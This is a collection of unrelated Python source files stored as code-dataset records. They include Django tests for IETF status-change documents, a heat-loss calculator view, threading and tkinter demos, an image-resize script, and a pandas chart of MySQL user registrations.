Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.latest_event(TelechatDocEvent, \"scheduled_for_telechat\").telechat_date,telechat_date)\n\n # move it forward a telechat (this should NOT set the returning item bit)\n telechat_date = TelechatDate.objects.active().order_by('date')[1].date\n r = self.client.post(url,dict(telechat_date=telechat_date.isoformat()))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertFalse(doc.returning_item())\n\n # set the returning item bit without changing the date\n r = self.client.post(url,dict(telechat_date=telechat_date.isoformat(),returning_item=\"on\"))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertTrue(doc.returning_item())\n\n # clear the returning item bit\n r = self.client.post(url,dict(telechat_date=telechat_date.isoformat()))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertFalse(doc.returning_item())\n\n # Take the doc back off any telechat\n r = self.client.post(url,dict(telechat_date=\"\"))\n self.assertEqual(r.status_code, 302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.latest_event(TelechatDocEvent, \"scheduled_for_telechat\").telechat_date,None)\n\n def test_edit_lc(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.last_call',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # additional setup\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9999'),relationship_id='tois')\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9998'),relationship_id='tohist')\n doc.ad = Person.objects.get(name='Ad No2')\n doc.save_with_history([DocEvent.objects.create(doc=doc, rev=doc.rev, type=\"changed_document\", by=Person.objects.get(user__username=\"secretary\"), desc=\"Test\")])\n \n # get\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('form.edit-last-call-text')),1)\n\n self.assertTrue( 'RFC9999 from Proposed Standard to Internet Standard' in ''.join(wrap(r.content,2**16)))\n self.assertTrue( 'RFC9998 from Informational to Historic' in ''.join(wrap(r.content,2**16)))\n \n # save\n r = self.client.post(url,dict(last_call_text=\"Bogus last call text\",save_last_call_text=\"1\"))\n self.assertEqual(r.status_code, 200)\n\n last_call_event = doc.latest_event(WriteupDocEvent, type=\"changed_last_call_text\")\n self.assertEqual(last_call_event.text,\"Bogus last call text\")\n\n # reset\n r = self.client.post(url,dict(regenerate_last_call_text=\"1\"))\n self.assertEqual(r.status_code,200)\n self.assertTrue( 'RFC9999 from Proposed Standard to Internet Standard' in ''.join(wrap(r.content,2**16)))\n self.assertTrue( 'RFC9998 from Informational to Historic' in ''.join(wrap(r.content,2**16)))\n \n # request last call\n messages_before = len(outbox)\n r = self.client.post(url,dict(last_call_text='stuff',send_last_call_request='Save+and+Request+Last+Call'))\n self.assertEqual(r.status_code,200)\n self.assertTrue( 'Last call requested' in ''.join(wrap(r.content,2**16)))\n self.assertEqual(len(outbox), messages_before + 1)\n self.assertTrue('Last Call:' in outbox[-1]['Subject'])\n self.assertTrue('Last Call Request has been submitted' in ''.join(wrap(unicode(outbox[-1]),2**16)))\n\n\n def test_approve(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.approve',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"secretary\", url)\n \n # Some additional setup\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9999'),relationship_id='tois')\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9998'),relationship_id='tohist')\n create_ballot_if_not_open(None, doc, Person.objects.get(user__username=\"secretary\"), \"statchg\")\n doc.set_state(State.objects.get(slug='appr-pend',type='statchg'))\n\n # get\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('[type=submit]:contains(\"Send announcement\")')), 1)\n # There should be two messages to edit\n self.assertEqual(q('input#id_form-TOTAL_FORMS').val(),'2')\n self.assertTrue( '(rfc9999) to Internet Standard' in ''.join(wrap(r.content,2**16)))\n self.assertTrue( '(rfc9998) to Historic' in ''.join(wrap(r.content,2**16)))\n \n # submit\n messages_before = len(outbox)\n msg0=default_approval_text(doc,doc.relateddocument_set.all()[0])\n msg1=default_approval_text(doc,doc.relateddocument_set.all()[1])\n r = self.client.post(url,{'form-0-announcement_text':msg0,'form-1-announcement_text':msg1,'form-TOTAL_FORMS':'2','form-INITIAL_FORMS':'2','form-MAX_NUM_FORMS':''})\n self.assertEqual(r.status_code, 302)\n\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.get_state_slug(),'appr-sent')\n self.assertFalse(doc.ballot_open(\"statchg\"))\n \n self.assertEqual(len(outbox), messages_before + 2)\n self.assertTrue('Action:' in outbox[-1]['Subject'])\n self.assertTrue('ietf-announce' in outbox[-1]['To'])\n self.assertTrue('rfc-editor' in outbox[-1]['Cc'])\n self.assertTrue('(rfc9998) to Historic' in ''.join(wrap(unicode(outbox[-1])+unicode(outbox[-2]),2**16)))\n self.assertTrue('(rfc9999) to Internet Standard' in ''.join(wrap(unicode(outbox[-1])+unicode(outbox[-2]),2**16)))\n\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('The following approval message was sent')) \n\n def test_edit_relations(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.edit_relations',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"secretary\", url)\n \n # Some additional setup\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9999'),relationship_id='tois')\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9998'),relationship_id='tohist')\n\n # get\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('#content [type=submit]:contains(\"Save\")')),1)\n # There should be three rows on the form\n self.assertEqual(len(q('#content .row')),3)\n\n # Try to add a relation to an RFC that doesn't exist\n r = self.client.post(url,dict(new_relation_row_blah=\"rfc9997\",\n statchg_relation_row_blah=\"tois\"))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form ul.errorlist')) > 0)\n\n # Try to add a relation leaving the relation type blank\n r = self.client.post(url,dict(new_relation_row_blah=\"rfc9999\",\n statchg_relation_row_blah=\"\"))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form ul.errorlist')) > 0)\n\n # Try to add a relation with an unknown relationship type\n r = self.client.post(url,dict(new_relation_row_blah=\"rfc9999\",\n statchg_relation_row_blah=\"badslug\"))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form ul.errorlist')) > 0)\n \n # Successful change of relations\n r = self.client.post(url,dict(new_relation_row_blah=\"rfc9999\",\n statchg_relation_row_blah=\"toexp\",\n new_relation_row_foo=\"rfc9998\",\n statchg_relation_row_foo=\"tobcp\",\n new_relation_row_nob=\"rfc14\",\n statchg_relation_row_nob=\"tohist\"))\n self.assertEqual(r.status_code, 302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.relateddocument_set.count(),3)\n def verify_relations(doc,target_name,status):\n target_doc=doc.relateddocument_set.filter(target__name=target_name)\n self.assertTrue(target_doc)\n self.assertEqual(target_doc.count(),1)\n self.assertEqual(target_doc[0].relationship.slug,status)\n verify_relations(doc,'rfc9999','toexp' )\n verify_relations(doc,'rfc9998','tobcp' )\n verify_relations(doc,'rfc14' ,'tohist')\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('Affected RFC list changed.')) \n \n def setUp(self):\n IndividualRfcFactory(alias2__name='rfc14',name='draft-was-never-issued',std_level_id='unkn')\n WgRfcFactory(alias2__name='rfc9999',name='draft-ietf-random-thing',std_level_id='ps')\n WgRfcFactory(alias2__name='rfc9998',name='draft-ietf-random-other-thing',std_level_id='inf')\n DocumentFactory(type_id='statchg',name='status-change-imaginary-mid-review',notify='notify@example.org')\n\nclass StatusChangeSubmitTests(TestCase):\n def test_initial_submission(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.submit',kwargs=dict(name=doc.name))\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get\n r = self.client.get(url)\n self.assertEqual(r.status_code,200)\n q = PyQuery(r.content)\n self.assertTrue(q('textarea')[0].text.strip().startswith(\"Provide a description\"))\n \n # Faulty posts using textbox\n # Right now, nothing to test - we let people put whatever the web browser will let them put into that textbox\n\n # sane post using textbox\n path = os.path.join(settings.STATUS_CHANGE_PATH, '%s-%s.txt' % (doc.canonical_name(), doc.rev))\n self.assertEqual(doc.rev,u'00')\n self.assertFalse(os.path.exists(path))\n r = self.client.post(url,dict(content=\"Some initial review text\\n\",submit_response=\"1\"))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.rev,u'00')\n with open(path) as f:\n self.assertEqual(f.read(),\"Some initial review text\\n\")\n self.assertTrue( \"mid-review-00\" in doc.latest_event(NewRevisionDocEvent).desc)\n\n def test_subsequent_submission(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.submit',kwargs=dict(name=doc.name))\n login_testing_unauthorized(self, \"ad\", url)\n\n # A little additional setup \n # doc.rev is u'00' per the test setup - double-checking that here - if it fails, the breakage is in setUp\n self.assertEqual(doc.rev,u'00')\n path = os.path.join(settings.STATUS_CHANGE_PATH, '%s-%s.txt' % (doc.canonical_name(), doc.rev))\n with open(path,'w') as f:\n f.write('This is the old proposal.')\n f.close()\n # Put the old proposal into IESG review (exercises ballot tab when looking at an older revision below)\n state_change_url = urlreverse('ietf.doc.views_status_change.change_state',kwargs=dict(name=doc.name))\n iesgeval_pk = str(State.objects.get(slug='iesgeval',type__slug='statchg').pk)\n r = self.client.post(state_change_url,dict(new_state=iesgeval_pk))\n self.assertEqual(r.status_code, 302)\n\n # normal get\n r = self.client.get(url)\n self.assertEqual(r.status_code,200)\n q = PyQuery(r.content)\n self.assertTrue(q('textarea')[0].text.strip().startswith(\"This is the old proposal.\"))\n\n # faulty posts trying to use file upload\n # Copied from wgtracker tests - is this really testing the server code, or is it testing\n # how client.post populates Content-Type?\n test_file = StringIO(\"\\x10\\x11\\x12\") # post binary file\n test_file.name = \"unnamed\"\n r = self.client.post(url, dict(txt=test_file,submit_response=\"1\"))\n self.assertEqual(r.status_code, 200)\n self.assertTrue(\"does not appear to be a text file\" in unicontent(r))\n\n # sane post uploading a file\n test_file = StringIO(\"This is a new proposal.\")\n test_file.name = \"unnamed\"\n r = self.client.post(url,dict(txt=test_file,submit_response=\"1\"))\n self.assertEqual(r.status_code, 302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.rev,u'01')\n path = os.path.join(settings.STATUS_CHANGE_PATH, '%s-%s.txt' % (doc.canonical_name(), doc.rev))\n with open(path) as f:\n self.assertEqual(f.read(),\"This is a new proposal.\")\n f.close()\n self.assertTrue( \"mid-review-01\" in doc.latest_event(NewRevisionDocEvent).desc)\n\n # verify reset text button works\n r = self.client.post(url,dict(reset_text=\"1\"))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(q('textarea')[0].text.strip().startswith(\"Provide a description\"))\n\n # make sure we can see the old revision\n url = urlreverse('ietf.doc.views_doc.document_main',kwargs=dict(name=doc.name,rev='00'))\n r = self.client.get(url)\n self.assertEqual(r.status_code,200)\n self.assertTrue(\"This is the old proposal.\" in unicontent(r))\n\n def setUp(self):\n DocumentFactory(type_id='statchg',name='status-change-imaginary-mid-review',notify='notify@example.org')\n self.test_dir = self.tempdir('status-change')\n self.saved_status_change_path = settings.STATUS_CHANGE_PATH\n settings.STATUS_CHANGE_PATH = self.test_dir\n\n def tearDown(self):\n settings.STATUS_CHANGE_PATH = self.saved_status_change_path\n shutil.rmtree(self.test_dir)\n","sub_path":"ietf/doc/tests_status_change.py","file_name":"tests_status_change.py","file_ext":"py","file_size_in_byte":25120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"133335292","text":"class MongoVenue(object):\n\n\tdef __init__(self, venue_id, lat, lon):\n\t\t\"\"\"Initialize a MongoVenue object to allow for spatial\n\t\toperations within the MongoDB instance.\n\t\t\"\"\"\n\t\tself.venue_id = str(venue_id)\n\t\tself.lat = float(lat)\n\t\tself.lon = float(lon)\n\n\ndef encode_venue(venue):\n\treturn { \"_type\": \"venue\", \"id\": venue.venue_id,\n\t\t\t \"loc\": { \n\t\t\t \t\"type\": \"Point\",\n\t\t\t \t\"coordinate\": [ venue.lon, venue.lat ] \n\t\t\t }\n\t\t\t}\n\ndef decode_venue(document):\n\tassert document[\"_type\"] == \"venue\"\n\tlat = document[\"loc\"][\"coordinate\"][1]\n\tlon = document[\"loc\"][\"coordinate\"][0]\n\treturn MongoVenue(document[\"id\"], lat, lon)","sub_path":"maestro/utils/spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244394129","text":"from django.shortcuts import render\nfrom urllib.request import urlopen\nfrom blogs.models import BlogTheme\nimport re\nfrom bs4 import BeautifulSoup\nfrom news.models import News\n\n\ndef home_page(request):\n themes = BlogTheme.objects.all()\n news_objects = News.objects.all().order_by('-date')[:5]\n context = {\n 'themes': themes,\n 'news_objects': news_objects}\n return render(request, 'energy_kalk/index.html', context)\n\n\ndef calculator(request):\n themes = BlogTheme.objects.all()\n if request.method == 'POST':\n\n city_data = {'Ужгород': (1.6, 162), 'Київ': (-1.1, 187)}\n wall_material_data = {'Селікатна цегла': 0.76, 'Суцільна цегла': 0.7,\n 'Пустотіла цегла': 0.52, 'Керамзитобетон': 0.44}\n ceiling_floor_material_data = {'Бетон': 1.7, 'Дерево': 0.13}\n\n length = float(request.POST['hause_length'])\n width = float(request.POST['hause_width'])\n height = float(request.POST['hause_height'])\n city = request.POST['city']\n\n wall_material = request.POST['wall_material']\n wall_thickness = float(request.POST['wall_thickness'])\n\n ceiling_material = request.POST['ceiling_material']\n ceiling_thickness = float(request.POST['ceiling_thickness'])\n\n window_area = float(request.POST['area_windows'])\n\n floor_material = request.POST['floor_material']\n floor_thickness = float(request.POST['floor_thickness'])\n\n def wall_area(length, height, width):\n area = ((length * height) * 2 + (width * height) * 2)\n - window_area\n return area\n\n def koefi(thick, mater, ins_thickness, ins_material_a):\n koef = 1 / (thick / mater)\n koef_ins = 1 / ((thick / mater) + (ins_thickness / ins_material_a))\n return koef, koef_ins\n\n def wall_loss(area, koef):\n q = (((\n koef[0] * area *\n (18 - city_data[str(city)][0])) / 1000) *\n 24 * city_data[str(city)][1]) / 9.45\n q_kw = ((\n koef[0] * area * (18 - city_data[str(city)][0])) /\n 1000) * 24 * city_data[str(city)][1]\n return q, q_kw\n\n def window_loss(window_area):\n win_loss_kw = (((\n 132 * window_area) / 1000) * 24) * city_data[str(city)][1]\n win_loss = ((((\n 132 * window_area) / 1000) * 24) *\n city_data[str(city)][1]) / 9.45\n return win_loss, win_loss_kw\n\n def en_loss(length, width, koef, loss_koef):\n loss_kw = (((\n length * width) * koef[0] * loss_koef * (18 - 8)) /\n 1000) * 24 * city_data[str(city)][1]\n loss = ((((\n length * width) * koef[0] * loss_koef * (18 - 8)) /\n 1000) * 24 * city_data[str(city)][1]) / 9.45\n loss_ins = ((((\n length * width) * koef[1] * loss_koef * (18 - 8)) /\n 1000) * 24 * city_data[str(city)][1]) / 9.45\n return loss, loss_kw, loss_ins\n\n def gas_price(sum_loss, sum_loss_ins):\n if sum_loss > 1200:\n result = 1200 * 3.6 + (sum_loss - 1200) * 7.8\n else:\n result = sum_loss * 3.6\n\n if sum_loss_ins > 1200:\n result_ins = 1200 * 3.6 + (sum_loss_ins - 1200) * 7.8\n else:\n result_ins = sum_loss_ins * 3.6\n return result, result_ins\n\n def min_price_pars(url):\n page = urlopen(url)\n page_obj = BeautifulSoup(page, \"html.parser\")\n price_page_pars = page_obj.find('div', 'items-wrapper grid')\\\n .find('div', 'price')\n min_price = re.search(r'\\d+.\\d+', price_page_pars.text).group(0)\n\n area_units_pars = page_obj.find('div', 'info')\n area_units_pars = re.findall(\n r'Площа одиниці - \\d+.\\d+', area_units_pars.text)\n for elem in area_units_pars:\n area = re.search(r'\\d+.\\d+', elem).group(0)\n\n title = page_obj.find('div', 'title')\n style_atrib = page_obj.find('a', 'bx_catalog_item_images')['style']\n href_atrib = page_obj.find('a', 'bx_catalog_item_images')['href']\n\n image_url = 'http://nl.ua' + re.search(\n r'/upload/[a-z, 0-9, \\s, \\S]*.jpg', style_atrib).group(0)\n material_link = 'http://nl.ua' + re.search(\n r'.+', href_atrib).group(0)\n\n return (min_price, area, title, image_url, material_link)\n\n def total_price_ins(price, area_units, area):\n numb_insulation = round(float(area) / float(area_units))\n result = float(price) * numb_insulation\n return result\n '''\n wall loss\n '''\n wall_area = wall_area(length, height, width)\n walls_koef = koefi(\n wall_thickness, wall_material_data[wall_material], 0, 1)\n q_wall = wall_loss(wall_area, walls_koef)[0]\n q_wall_kw = wall_loss(wall_area, walls_koef)[1]\n\n '''\n widnows loss\n '''\n q_window, q_window_kw = window_loss(window_area)[0],\\\n window_loss(window_area)[1]\n\n '''\n loss ceiling\n '''\n ceiling_koef = koefi(\n ceiling_thickness,\n ceiling_floor_material_data[ceiling_material],\n 0.05, 0.048)\n q_ceiling = en_loss(length, width, ceiling_koef, 1)[0]\n q_ceiling_kw = en_loss(length, width, ceiling_koef, 1)[1]\n q_ceiling_ins = en_loss(length, width, ceiling_koef, 1)[2]\n\n '''\n loss floors\n '''\n floor_koef = koefi(\n floor_thickness,\n ceiling_floor_material_data[floor_material],\n 0.05, 0.048)\n q_floor = en_loss(length, width, floor_koef, 1)[0]\n q_floor_kw = en_loss(length, width, floor_koef, 1)[1]\n q_floor_ins = en_loss(length, width, floor_koef, 1)[2]\n\n sum_loss = q_wall + q_window + q_ceiling + q_floor\n sum_loss_ins = q_wall + q_window + q_ceiling_ins + q_floor_ins\n\n '''\n gas price\n '''\n sum_gas_loss = gas_price(sum_loss, sum_loss_ins)[0]\n sum_gas_loss_ins = gas_price(sum_loss, sum_loss_ins)[1]\n\n '''\n parsing price\n '''\n price_un_area = min_price_pars('http://goo.gl/RS79DA')\n total_price = total_price_ins(\n price_un_area[0], price_un_area[1],\n (length * width) * 2)\n title = price_un_area[2].text\n image_url = price_un_area[3]\n insulation_link = price_un_area[4]\n\n context = {\n 'q_wall': round(q_wall, 2),\n 'q_wall_kw': round(q_wall_kw, 2),\n 'city_day': city_data[str(city)][1],\n 'window_area': window_area,\n 'wall_area': wall_area,\n 'q_window': round(q_window, 2),\n 'q_window_kw': round(q_window_kw, 2),\n 'q_ceiling': round(q_ceiling, 2),\n 'q_ceiling_kw': round(q_ceiling_kw, 2),\n 'q_floor': round(q_floor, 2),\n 'q_floor_kw': round(q_floor_kw, 2),\n 'sum_loss': round(sum_loss, 2),\n 'sum_gas_loss': round(sum_gas_loss, 2),\n 'sum_gas_loss_ins': round(sum_gas_loss_ins, 2),\n 'total_price': round(total_price, 2),\n 'title': title,\n 'image_url': image_url,\n 'insulation_link': insulation_link,\n 'nbar': 'kalkulator',\n 'themes': themes}\n\n return render(request, 'energy_kalk/kalkulator_result.html', context)\n context = {\n 'themes': themes}\n return render(request, 'energy_kalk/kalkulator.html', context)\n","sub_path":"energy_kalk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"288663596","text":"\"\"\"\n什么是进程?\n1.进程是执行中的程序\n2.拥有独立地址空间、内存、数据栈等\n4.操作系统管理\n5.派生(fork或spawn)新进程\n6.进程间通信(IPC)方式共享信息\n\n什么是线程?\n1.同进程下执行,并共享相同的上下文\n2.线程间的信息共享和通信更加容易\n3.多线程并发执行(不是指多个线程同时执行,而是指多个线程轮换执行)\n4.需要同步原语\n\nPython与线程\n1.解释器主循环\n2.主循环中只有一个控制线程在执行\n3.使用全局解释器锁(GIL)\n\nPython线程管理\n-thread:提供了基本的线程和锁\nthreading:提供了更高级别,功能更全面的线程管理\n1.支持同步机制\n2.支持守护线程\n\n\"\"\"\nimport _thread\nimport logging\nfrom time import sleep, ctime\n\nlogging.basicConfig(level=logging.INFO)\n\nloops = [2, 4]\n\n\ndef loop(nloop, nsec, lock):\n logging.info(f\"start {nloop} at \" + ctime())\n sleep(nsec)\n logging.info(f\"end {nloop} at \" + ctime())\n lock.release()\n\n\ndef main():\n logging.info(\"start all at \" + ctime())\n locks = []\n nloops = range(len(loops))\n for i in nloops: # 锁处理\n lock = _thread.allocate_lock() # 声明 锁\n lock.acquire() # 将锁锁上\n locks.append(lock) # 将锁传递给 locks 列表\n\n for i in nloops: # 启动线程\n _thread.start_new_thread(loop, (i, loops[i], locks[i]))\n\n for i in nloops: # 判断锁是否都被释放\n while locks[i].locked(): pass\n\n logging.info(\"end all at \" + ctime())\n # sleep(6) # _thread不成文的规定:当主线程结束的时候,所有子线程会强制杀死(没有守护线程的概念),所以这个主线程需要加睡眠时间,保证子线程也可以运行\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python Foundation/Python_Thread/Python_thread.py","file_name":"Python_thread.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69011870","text":"from tkinter import *\nroot = Tk()\n\nvar1 = StringVar()\nvar2 = StringVar()\nopt1 = OptionMenu(root, var1, 'spam', 'eggs', 'toast') #как и Menubutton\nopt2 = OptionMenu(root, var2, 'ham', 'bacon', 'sausage') #но отображает выбранный вариант\nopt1.pack(fill = X)\nopt2.pack(fill = X)\nvar1.set('spam')\nvar2.set('ham')\n\ndef state(): print(var1.get(), var2.get())\n\nButton(root, command = state, text='state').pack()\nroot.mainloop()\n\n","sub_path":"Lutts/Gui/Tour/menu/optionmenu.py","file_name":"optionmenu.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"324435418","text":"import os\nimport subprocess\n\n# create folder in working directory with given name\ndef create_folder(folder_name):\n if not os.path.exists(folder_name):\n os.makedirs(folder_name)\n print('Folder \"' + folder_name + '\" created.')\n else:\n print('Folder \"' + folder_name + '\" already exists.')\n\n# image resize for source to result folder\ndef image_resize(source_folder, result_folder, resize_pixels):\n for image in os.listdir(source_folder):\n if os.path.splitext(image)[1] == '.jpg':\n from_file = os.path.join(source_folder, image)\n to_file = os.path.join(result_folder, image)\n command_line = 'convert ' + from_file + ' -resize ' + str(resize_pixels) + ' ' + to_file\n try:\n subprocess.run(command_line)\n print(command_line, ' ...done')\n except:\n print(command_line, ' ...error')\n\nsource_folder = 'Source'\nresult_folder = 'Result'\n\ncreate_folder(result_folder)\nimage_resize(source_folder, result_folder, 200)\n","sub_path":"task_2.5/task_2.5.py","file_name":"task_2.5.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"296457435","text":"import pymysql\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#连接MySQL数据库,指定密码(passwd)和数据库(db)\nconn = pymysql.connect(host = \"localhost\",user = 'root',passwd ='root',db = 'test',charset=\"utf8\")\nsql_query = 'SELECT * FROM test.user' #SQL查询语句\ndata = pd.read_sql(sql_query, con=conn) #读取MySQL数据\nconn.close() # 关闭数据库连接\ndata=data[['username','addtime']] #提取指定列数据\ndata.rename(columns = {'addtime':'注册日期','username':'用户数量'},inplace=True) #列重命名\ndata['注册日期'] = pd.to_datetime(data['注册日期']) #将数据类型转换为日期类型\ndata = data.set_index('注册日期') # 将日期设置为索引\n#按月统计每一年的注册用户\nindex=['1月','2月','3月','4月','5月','6月','7月','8月','9月','10月','11月','12月']\ndf_2017=data['2017']\ndf_2017=df_2017.resample('M').size().to_period('M')\ndf_2017.index=index\ndf_2018=data['2018']\ndf_2018=df_2018.resample('M').size().to_period('M')\ndf_2018.index=index\ndf_2019=data['2019']\ndf_2019=df_2019.resample('M').size().to_period('M')\ndf_2019.index=index\ndfs=pd.concat([df_2017,df_2018,df_2019],axis=1)\n#设置列索引\ndfs.columns=['2017年','2018年','2019年']\ndfs.to_excel('result2.xlsx',index=False)# 导出数据为Excel文件\n#绘制折线图\nplt.rcParams['font.sans-serif']=['SimHei'] #解决中文乱码\nplt.title('年度注册用户分析图')\nx=index\ny1=dfs['2017年']\ny2=dfs['2018年']\ny3=dfs['2019年']\nplt.plot(x,y1,label='2017年',color='b',marker='o')\nplt.plot(x,y2,label='2018年',color='g',marker='o')\nplt.plot(x,y3,label='2019年',color='r',marker='o')\n#添加文本标签\nfor a,b1,b2,b3 in zip(x,y1,y2,y3):\n plt.text(a,b1+200,b1,ha = 'center',va = 'bottom',fontsize=8)\n plt.text(a,b2+100,b2,ha='center', va='bottom', fontsize=8)\n plt.text(a,b3+200,b3,ha='center', va='bottom', fontsize=8)\nx = range(0, 12, 1)\nplt.xlabel('注册日期')\nplt.ylabel('用户数量')\nplt.legend()\nplt.show()\n","sub_path":"Python数据分析从入门到精通/MR/Code/11/data_year.py","file_name":"data_year.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"283702563","text":"from django.conf.urls import patterns, url, include\nfrom .views import logs, Index, activeprocesses, diskinfo, raminfo, netinfo, netinfolist, getipfromhost\n\n\n\nurlpatterns = patterns('',\n # Does not work\n # Login / Logout\n #url(r'^login/$', 'login_user', name='login'),\n #url(r'^logout/$', 'logout_user', name='logout'),\n\n # Index\n # Make it nice\n url(r'^$', Index.as_view(), name='index'),\n # Works good\n url(r'^getipfromhost/$', getipfromhost, name='getipfromhost'), \n url(r'^activeprocesses/$', activeprocesses, name='activeprocesses'),\n url(r'^diskinfo/$', diskinfo, name='diskinfo'),\n url(r'^raminfo/$', raminfo, name='raminfo'),\n url(r'^netinfo/$', netinfo, name='netinfo'),\n url(r'^netinfolist/$', netinfolist, name='netinfolist'),\n # Diskspace\n #url(r'^diskspace/$', machinePanel, name='machinePanel'),\n\n # Logs\n #url(r'^logs/$', logs, name='logs'),\n)\n\n\n\n\n\n\n\n","sub_path":"serverinfo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"345502627","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nCopyright: Deutsches Zentrum fuer Luft- und Raumfahrt e.V., 2015 (c)\nContact: daniel.boehnke@dlr.de and jonas.jepsen@dlr.de\n'''\nfrom cmath import sqrt\n\nfrom VAMPzero.Handler.Parameter import parameter\n\n\nclass span(parameter):\n '''\n The span of the strut. It equals the distance from the root to the tip of the strut.\n \n :Unit: [m]\n '''\n\n def __init__(self, value=0., unit='m', parent='', cpacsPath=''):\n super(span, self).__init__(value=value, unit=unit, doc=self.__doc__, status='init', parent=parent,\n cpacsPath=cpacsPath)\n\n def calc(self):\n '''\n Calculates the strut span from its root and tip xyz-locations.\n '''\n xRoot = self.parent.xRoot.getValue()\n yRoot = self.parent.yRoot.getValue()\n zRoot = self.parent.zRoot.getValue()\n \n xTip = self.parent.xTip.getValue()\n yTip = self.parent.yTip.getValue()\n zTip = self.parent.zTip.getValue()\n\n return self.setValueCalc(sqrt((xRoot-xTip)**2+(yRoot-yTip)**2+(zRoot-zTip)**2))\n\n ###################################################################################################\n #EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFE#\n ###################################################################################################","sub_path":"src/VAMPzero/Component/Strut/Geometry/span.py","file_name":"span.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433161882","text":"#!/usr/bin/env python\n#coding:utf-8\n\n\"\"\"\n\nNAME:函数的离开练习.py\nAuthor:YuTao\nConnetc:616637861@qq.com\nDate:2018-05-05\nDesc:\n\n\n\n\n\"\"\"\n#number = int(input(\"输入一个数字:\"))\n\n\ndef collatz(number):\n if number%2 == 0:\n return number//2\n else:\n return 3*number+1\n\n\n\ndef main():\n num = int(input(\"输入一个数字:\"))\n while True:\n if collatz(num) == 1:\n print(1)\n break\n else:\n num = collatz(num)\n print(num)\n\n\nmain()\n","sub_path":"Python_training/day6/myfile/day_05/函数的离开练习.py","file_name":"函数的离开练习.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"573978722","text":"from django.db import models\nfrom mptt.models import MPTTModel\nfrom mptt.fields import TreeForeignKey, TreeManyToManyField\nfrom 